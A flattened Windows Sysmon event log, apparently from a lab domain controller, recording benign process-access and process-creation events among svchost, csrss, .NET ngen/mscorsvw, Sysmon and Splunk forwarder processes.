13:49:47.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.917{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.885{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.885{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.479{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.463{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.463{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FD-6005-6103-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.791{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.791{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6703-00000000A301}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.526{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 